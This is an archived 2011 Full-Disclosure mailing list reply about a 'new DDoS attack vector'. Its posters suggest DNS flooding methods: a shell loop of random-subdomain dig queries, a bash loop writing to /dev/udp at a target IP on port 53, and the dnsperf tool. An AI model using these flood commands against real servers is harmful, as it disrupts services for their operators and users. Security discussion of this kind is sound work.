lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Fri, 20 May 2011 16:08:05 +0200
From: Balder <balder.theglorious@...glemail.com>
To: Kristian Erik Hermansen <kristian.hermansen@...il.com>
Cc: "full-disclosure@...ts.grok.org.uk" <full-disclosure@...ts.grok.org.uk>
Subject: Re: New DDoS attack vector

On 20 May 2011 13:35, Kristian Erik Hermansen
<kristian.hermansen@...il.com> wrote:
> On Fri, May 20, 2011 at 4:29 AM, Balder
> <balder.theglorious@...glemail.com> wrote:
>>  * Why go to all this trouble when you could just do something like
>> the following (replacing dig with something faster)
>>    - while true ; do dig $(</dev/urandom tr -dc A-Za-z0-9 | head -c
>> 10 ).example.com MX  ; done
>
> dnsperf is what you really want ;)
even the following if if there is no IDS and if there is you would
probably have just as much chance of overloading its state table then
the dns server

while true ; do  echo /dev/urandom > /dev/udp/target_IP_address/53 ; done


thanks to /dev/random
http://blog.rootshell.be/2011/05/05/binbash-phone-home/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists